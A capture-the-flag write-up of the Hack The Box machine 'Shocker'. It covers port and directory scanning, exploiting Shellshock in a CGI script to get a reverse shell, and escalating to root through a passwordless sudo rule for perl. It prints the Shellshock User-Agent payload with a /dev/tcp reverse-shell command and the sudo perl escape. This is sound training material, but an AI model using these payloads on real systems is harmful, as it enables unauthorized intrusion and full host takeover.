Post

Shocker

Posted
Preview Image
By ChrisPham
views 3 min read

Writeup

After scanning, we know how many ports are opened, hostname and operating system is running on.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

nmap -sC -sV 10.129.50.15       
                    
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-30 18:48 EST
Nmap scan report for 10.129.50.15
Host is up (0.064s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let deep dive in the directory of webserver.

1
2
3
4
5
6
7
8

gobuster dir -u http://10.129.50.15 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -q  

/.hta                 (Status: 403) [Size: 291]
/.htaccess            (Status: 403) [Size: 296]
/.htpasswd            (Status: 403) [Size: 296]
/cgi-bin/             (Status: 403) [Size: 295]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 300]

Let ask AI for what is cgi-bin

Language Versatility: These scripts can be written in various programming languages, most commonly Perl, Python, Bash, and C.

So we will look for these file extension in this directory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

gobuster dir -u http://10.129.50.15 -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -q  
/.hta                 (Status: 403) [Size: 291]
/.htaccess            (Status: 403) [Size: 296]
/.htpasswd            (Status: 403) [Size: 296]
/cgi-bin/             (Status: 403) [Size: 295]
/index.html           (Status: 200) [Size: 137]
/server-status        (Status: 403) [Size: 300]
                                                                                                                                                           
┌──(x㉿kali)-[~]
└─$ gobuster dir -u http://10.129.50.15/cgi-bin -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -q -x sh,pl,py,c

/.hta.sh              (Status: 403) [Size: 302]
/.hta.c               (Status: 403) [Size: 301]
/.hta.pl              (Status: 403) [Size: 302]
/.hta.py              (Status: 403) [Size: 302]
/.htaccess            (Status: 403) [Size: 304]
/.hta                 (Status: 403) [Size: 299]
/.htpasswd.pl         (Status: 403) [Size: 307]
/.htpasswd.sh         (Status: 403) [Size: 307]
/.htpasswd.c          (Status: 403) [Size: 306]
/.htpasswd            (Status: 403) [Size: 304]
/.htpasswd.py         (Status: 403) [Size: 307]
/.htaccess.py         (Status: 403) [Size: 307]
/.htaccess.c          (Status: 403) [Size: 306]
/.htaccess.pl         (Status: 403) [Size: 307]
/.htaccess.sh         (Status: 403) [Size: 307]
/user.sh              (Status: 200) [Size: 118]

So we got user.sh. Let try to access it.

1
2
3
4
5
6
7

curl http://10.129.50.15/cgi-bin/user.sh    
                                                                                  
Content-Type: text/plain

Just an uptime test script

 19:00:07 up  1:57,  0 users,  load average: 0.00, 0.00, 0.00

So that looks like uptime command in bash.

1
2
3

uptime

 19:01:46 up 29 min,  1 user,  load average: 0.02, 0.05, 0.09

ShellShock, AKA Bashdoor or CVE-2014-6271, was a vulnerability in Bash discovered in 2014 which has to do with the Bash syntax for defining functions. It allowed an attacker to execute commands in places where it should only be doing something safe like defining an environment variable.

1

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

Now let try it with burpsuite

Change User-Agent to our payload, and it worked. Let spawn a shell on our machine with () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.192/4444 0>&1

1
2
3
4
5
6
7
8
9

nc -nvlp 4444                                       
listening on [any] 4444 ...

connect to [10.10.14.192] from (UNKNOWN) [10.129.50.15] 60294
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
shelly@Shocker:/usr/lib/cgi-bin$

We are in! Let see what command we can execute without password as root.

1
2
3
4
5
6
7
8
9

sudo -l

Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

So we see /usr/bin/perl, perl has -e flag that allows us to run Perl from the command line.

1
2
3
4
5
6

shelly@Shocker:/usr/lib/cgi-bin$ sudo perl -e 'exec"/bin/bash"'
sudo perl -e 'exec"/bin/bash"'
python3 -c 'import pty; pty.spawn("/bin/bash")' 
root@Shocker:/usr/lib/cgi-bin# whoami
whoami
root

We rooted it!

HTB-machine, linux, easy
HTB CTF writeup nmap shell